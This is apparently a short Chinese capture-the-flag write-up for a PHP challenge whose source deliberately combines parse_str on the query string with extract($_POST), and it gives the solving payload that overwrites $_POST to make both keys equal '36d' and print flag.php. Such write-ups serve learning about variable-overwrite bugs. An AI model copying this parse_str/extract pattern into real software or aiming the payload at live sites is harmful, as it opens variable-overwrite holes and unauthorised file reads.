源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-14 23:01:06
*/
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {
die("nonononono");
}
@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
if($key1 == '36d' && $key2 == '36d') {
die(file_get_contents('flag.php'));
}
思路
这题很简单,考点还是变量覆盖
本地测试一下
parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
var_dump(get_defined_vars());
我们传入?_POST[a]=1&_POST[b]=12
经过parse_str($_SERVER['QUERY_STRING'])
post中存在了array(2) { ["a"]=> string(1) "1" ["b"]=> string(2) "12" }
经过 extract($_POST);
成功创建变量a,b并覆盖值
题解
?_POST[key1]=36d&_POST[key2]=36d
``
总结
水题